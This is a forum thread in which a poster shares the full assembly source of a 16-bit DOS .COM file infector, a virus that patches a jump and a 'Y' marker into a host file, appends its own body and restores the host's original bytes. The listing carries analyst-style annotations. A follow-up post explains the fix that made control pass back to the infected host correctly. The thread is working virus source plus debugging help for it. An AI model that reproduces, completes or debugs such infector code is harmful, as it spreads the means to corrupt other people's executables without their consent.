Re: Infecting COM problem
Ok, I have been able to solve the problem. But now there is another problem: I can't restore control to the original host program. I mean, copying the 4 bytes back to 100h isn't working. I even appended the 4 bytes at the end of the file, then read them back from the file and put them at 100h — no use. The bytes read and the bytes written are completely different. Can anybody help?
Code:
; ----------------------------------------------------------------------
; 16-bit DOS .COM infector sample (MASM syntax, org 100h, cs=ds=es).
; Analyst's annotation of the routine as posted; the code itself is left
; byte-identical. Observable artifacts, all taken from this listing:
;   - a processed file starts with E9 xx xx 'Y' (jmp rel16 + marker byte);
;   - the search pattern is '.\*.COM' (INT 21h/4Eh, current directory);
;   - the string "Hello World$" is printed on every run.
; Register roles: bp = relocation delta (runtime offset - assembled offset),
; bx = DOS file handle once the file is opened.
; ----------------------------------------------------------------------
c_seg segment 'code'
org 100h
assume cs:c_seg
main proc near
start_:
; adjust the segments
; .COM entry has cs=ds=es=ss; ds/es are reasserted from cs so the
; bp-relative data references below resolve inside the running image.
mov ax, cs
mov ds, ax
mov es, ax
; getting offsets
; call/pop trick: the call pushes the runtime offset of fals_proc;
; subtracting its assembled offset leaves the delta in bp. bp is 0 only
; when the image runs at its assembled position (first run / dropper).
call fals_proc
fals_proc proc
fals_proc endp
pop bp
sub bp, offset fals_proc
; set DTA
; INT 21h/1Ah: DTA = the relocated 43-byte 'DTA' buffer declared below.
mov ah, 1Ah
lea dx, [bp + offset DTA]
int 21h
; find first file
; INT 21h/4Eh, attribute mask cx=7 (read-only|hidden|system), pattern
; '.\*.COM'. Only the first match is handled; there is no find-next and
; the CF error return is not checked.
mov ah, 4eh
lea dx, [bp + offset first_file]
mov cx, 7
int 21h
; preparing full path .\*A.COM
; Builds file_name = ".\" + the ASCIIZ name from the find record
; (DTA+1Eh). cx is not reloaded before rep movsb: it still holds 7 from
; the attribute mask unless INT 21h changed it, so 7 bytes are copied
; regardless of the name's length, then a 0 terminator is stored at di.
lea di, [bp + offset file_name]
mov byte ptr[di], '.'
inc di
mov byte ptr[di], '\'
inc di
lea si, [bp + offset DTA + 1Eh]
rep movsb
mov byte ptr[di], 0
; open file
; INT 21h/3Dh with al=2 (read/write); handle in ax, CF on error (unchecked).
mov ah, 3Dh
mov al, 2
lea dx, [bp + offset file_name]
int 21h
; save handle
; bx = handle for the calls that follow; the copy stored in fHandle is
; never read anywhere in this listing.
push ax
push ax
pop bx
pop [bp + fHandle]
; read first four bytes
; INT 21h/3Fh: buffer = the file's first 4 bytes, i.e. the host's
; original entry bytes, or the jump patch if the file was already marked.
mov ah, 3Fh
mov cx, 4
lea dx, [bp + offset buffer]
int 21h
; if virus signature matches don't infect just quit
; Marker check: file byte 3 compared with vir_sig ('Y').
mov al, byte ptr[bp + offset buffer + 3]
mov dl, byte ptr [bp + offset vir_sig]
cmp al, dl
jne jmp_patchin_
; Already marked: close the handle, print the message, then exit via
; INT 21h/4Ch when bp=0 (running at assembled offsets), otherwise go to
; the host hand-off at dispatcher_.
mov ah, 3Eh
int 21h
mov ah, 09h
lea dx, [bp + offset infection]
int 21h
cmp bp, 0
je quitzz_
jmp dispatcher_
quitzz_:
mov ah, 4ch
int 21h
jmp_patchin_:
; set file pointer to begin
; INT 21h/42h, al=0 (seek from start), cx:dx = 0.
mov ax, 4200h
mov cx, 0
mov dx, 0
int 21h
; ===== the jump patch =====
; jmp_patch = E9 <rel16> 'Y'. A near jmp's displacement is relative to
; the byte after the 3-byte instruction, so rel16 = original size - 3
; targets the first byte appended at the old end of file. Byte 3 is the
; marker checked above.
mov byte ptr[bp + jmp_patch], 0E9h
mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size (low word of the dword size field at DTA+1Ah)
sub ax, 3
mov word ptr[bp + jmp_patch + 1], ax
mov al, vir_sig
mov byte ptr[bp + jmp_patch + 3], al
; INT 21h/40h: overwrite the file's first 4 bytes with the patch.
mov ah, 40h
mov cx, 4
lea dx, [bp + offset jmp_patch]
int 21h
; append the virus
; Seek to end (al=2, cx:dx=0), then write the whole image from main to
; end_vir — code and the data block below included.
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
mov ah, 40h
mov cx, offset end_vir - offset main
lea dx, [bp + offset main]
int 21h
; append the first 4 byte too
; Second seek to end, then a 4-byte write of 'buffer' (the bytes read at
; the top of the routine) after the appended body.
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
mov ah, 40h
lea dx, [bp + offset buffer]
mov cx, 4
int 21h
; INT 21h/3Eh: close the handle in bx.
mov ah, 3eh
int 21h
dispatcher_:
; Host hand-off: reopen file_name read/write, bx = new handle, then seek
; to the end of the file (al=2, cx:dx=0).
mov ah, 3Dh
mov al, 02h
lea dx, [bp + offset file_name]
int 21h
mov bx, ax
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
; restore the first 4 bit
; Reads 4 bytes at the position left by the seek above into buffer, then
; copies buffer over cs:100h (ds=es=cs) — the running image's own entry
; bytes — before control is transferred there.
mov ah, 3Fh
lea dx, [bp + offset buffer]
mov cx, 4
int 21h
mov cx, 4
lea si, [bp + offset buffer]
mov di, 100h
rep movsb
; INT 21h/09h: print the '$'-terminated message.
mov ah, 09h
lea dx, [bp + offset infection]
int 21h
; Debug output: INT 21h/02h prints, one character each, the 4 bytes now
; at 100h and then the 4 bytes held in buffer.
mov di, 100h
mov cx, 4
loop_1:
mov ah, 02h
mov dl, byte ptr[di]
int 21h
loop loop_1
lea di, [bp + offset buffer]
mov cx, 4
loop_2:
mov ah, 02h
mov dl, byte ptr[di]
int 21h
loop loop_2
;mov ah, 01
;int 21h
; close
mov ah, 3Eh
int 21h
; Transfer control to whatever now sits at cs:100h.
mov ax, 0100h
jmp ax
;quit_:
; mov ah, 4ch
; int 21h
DTA db 43 dup (?)            ; DOS find-first record (size dword at +1Ah, name at +1Eh)
first_file db '.\*.COM', 0   ; search pattern: .COM files in the current directory
file_name db 255 dup (?)     ; ".\<name>" assembled above
extra_buffer db 20 dup (?)   ; unused in this listing
fHandle dw ?                 ; written once, never read
buffer db 4 dup (0)          ; first 4 bytes of the scanned file
jmp_patch db 4 dup (0)       ; E9 rel16 'Y', written to file offset 0
infection db "Hello World$"  ; printed via INT 21h/09h ('$'-terminated)
vir_sig db 'Y'               ; marker expected at file offset 3
main endp
end_vir label near           ; end of the image that gets appended
c_seg ends
end start_
Re: Infecting COM problem
Solved it guyz.. here is what was happening...
I saved the first 4 bytes to buffer.
Now, when I was reading 4 bytes to check for prior infection, I was again reading into buffer. This time buffer was filled with the jump patcher and the virus signature. Then at runtime I was overwriting the first 4 bytes of code with buffer — the same thing, the jump patcher — and this caused an infinite loop. While checking for prior infection I now read the 4 bytes into a separate buffer, and that solved the prob guyz.. thanx anyway. :D